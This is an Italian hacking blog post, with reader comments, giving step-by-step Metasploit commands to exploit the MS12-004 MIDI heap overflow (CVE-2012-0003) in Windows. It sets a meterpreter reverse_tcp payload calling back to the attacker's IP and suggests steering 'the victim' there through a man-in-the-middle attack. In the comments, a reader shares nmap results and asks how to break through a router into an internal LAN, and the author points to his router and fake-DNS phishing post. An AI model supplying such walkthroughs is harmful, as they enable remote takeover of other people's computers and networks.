Category:

[ms12_004] Metaploit && Windows Remote Code Excution With .MIDI Files

January 27th, 2012 by clshack_

Nuovo bug per mamma microsoft.
Vi ricordo che ms12_004 è attualmente in giro per il mondo ad infettare pc windows :D

Risolto con l’aggiornamento KB2631813.

Da metasploit description:

This module exploits a heap overflow vulnerability in the Windows Multimedia
Library (winmm.dll). The vulnerability occurs when parsing specially crafted
MIDI files.
Remote code execution can be achieved by using Windows Media Player’s
ActiveX control.

Per ora l’exploit è compatibile sono con la seguente configurazione:

At this time, for IE 8 target, JRE (Java Runtime Environment) is required
to bypass DEP (Data Execution Prevention).

Targato con CVE:2012-0003 è facile usare questo modulo con metasploit ;)
La prima cosa da fare è aggiornare metasploit:
sudo msfupdate
La seconda cosa da fare è avviare metasploit :D
sudo msfconsole
Ora cerchiamo l’exploit:
search midi

Usiamo l’exploit trovato esempio:
use exploit/windows/browser/ms12_004_midi

Settiamo un payload:
set payload windows/meterpreter/reverse_tcp

set LHOST YOUR_IP

Vediamo le opzioni e cambiamo quelle che vogliamo:
show options
Facciamo partire il server:
exploit
Reindirizziamo la vittima sul nostro ip magari con un mitm e fuck windows :D

Video:

Share it:

Related posts:

  1. [EXPLOIT]Windows Help Centre Remote code Excution
  2. [CVE-2010-2568]Metasploit:windows Oday Remote Code Exuction
  3. [CVE-2010-1297]Metasploit:Flash Player 9x, 10.0 Remote code Excution
  4. [Metasploit]Sun Java Web Start Plugin Remote Code Excution
  5. CVE-2010-3765: Mozilla Firefox remote code Excution module for metasploit
  6. [DLL Hijacking] Windows 7 and more application Remote code Exuction => metasplooit
  7. IE 6/7 EXPLOIT XML Remote Code Execution with METASPLOIT
  8. [exploit]Windows XP SP3 IE 7,8 Remote CODE Execution


Tags: , , ,
Posted in Hacking, Software, Windows | 7 Comments »
«
»
You can leave a response, or trackback from your own site.
  • MaX-xXx

    Ho provato sia con IE che con chrome in tutti e due i casi il msg è

    192.168.1.4:49210 Unknown user-agent

  • clshack_

    è vedrai che adesso aggiornano a me manda il payload ma non apre la shell XD

  • bubusette

    Noto che tutte queste prove vengono fatte in una rete locale.
    Quello che non capisco è come fare le stesse cosa da remoto senza fare eseguire il lancio di IE verso il mio ip.
    Mi Spiego meglio… sto cercando di capire come fare a entrare su un server winodws2003 dietro un router (server e router conoscendo il padrone) … usati come cavia.
    Ho fatto lo scan dell’indirizzo ip della Cavia e trovo che ci sono aperte le porte 80 che mi fa entrare sul suo sito web e la porta 3389 Desktop remoto (che utilizziamo quando ci sono problemi) e la porta 22 ssh che fa il redirect su un pc che fa da proxy per la rete interna.
    Lo scan mi porta al router e vedo le porte, dopo di che vorrei capire come mettere in comunicazione le porte del router cavia verso il mio ip, immagino che se riesco a mettere in contatto le due porte dovrei avere accesso alla lan interna. Oppure dovrei trovare altre strade da percorre?
    Sicuramente una volta passato il router conoscendo le credenziali posso aprire una porta per creare una connessione diretta, ma quello a me non interessa, inrteressa come entrare nel router e arrivare alla lan interna dove ci sono tutti i pc con le vaie condivisioni. quindi troverei le porte 145 aperte ecc. visto che tutti i pc sono senza firewall attivo, quindi diciamo che conosco bene il tutto.
    Ciao

  • clshack_

    Non ho ben capito cosa vuoi fare, comunque se hai accesso a un router puoi fare diverse cose ad esempio:
    http://www.clshack.com/attack-router-fake-dns-and-phishing-exploiting-attack-victim.html

    E poi per eseguire questo exploit su un 2003 server dovresti aprire internet explorer sul server e andare sull’ip in ascolto.

  • bubusette

    vorrei fare:
    da remoto, entrare nel router (visto che se metto indirzzo ISP con la porta 80 mi esce il SitoWEb che si trova il locale su IIS6 quindi non riesco a vedere la pagina di configurazione del modem. ho provato con il telnet ma la 23 è chiusa.
    Vorrei capire come si può passare il router per entrare nella lan interna.

  • bubusette

    questo e lo scan con nmap

    22/tcp open ssh —-> porta su un server linux che fa da proxy per la navigazione filtrata ( usata anche per navigare da esterno in posto dove ci sono filtri.(aprendo tunnel ssh)
    80/tcp open http —> porta sul sit Web che si trova in locale
    3389/tcp open ms-term-serv —-> Viene usata per quando ci sono problemi
    8080/tcp closed http-proxy
    Vorrei capire come Posso arrivare alla lan interna , senza aprire ie6 far digitare indirizzo del pc in ascolto.
    vorrei capire come fare entrare sul server

  • bubusette

    dopo la risposta di cishack una risposta che sembra non funzionare visto che … per fare router attack dns si dovrebbe avere accesso al router da remoto… e io da remoto puntando il router mi risponde il sito Web Hostato il locale la porta del telnet è chiusa… vorrei sapere come posso fare.
    Mi sembra che leggendo sia tutto facile… in locale gli exploit funzionano a meraviglia, da remoto però ancora nessuno si è chiesto come fare? oppure a nessuno interessa.
    Diciamo che tutto questo nasce per la pura conscenza non a scopi cattivi questo è ovvio, visto che il server sò esattamente di chi è cosa si trova in rete ecc… era un metodo per testare la sicurezza del sistema e per imparare quelche cosa di utile.
    Vorrei capire come mettere in conumicazione le porte del router da remoto con le mie per poter aver accesso al router (esistono exploit esistono script)
    Ciao e spero che qualcuno mi risponda.
    CIao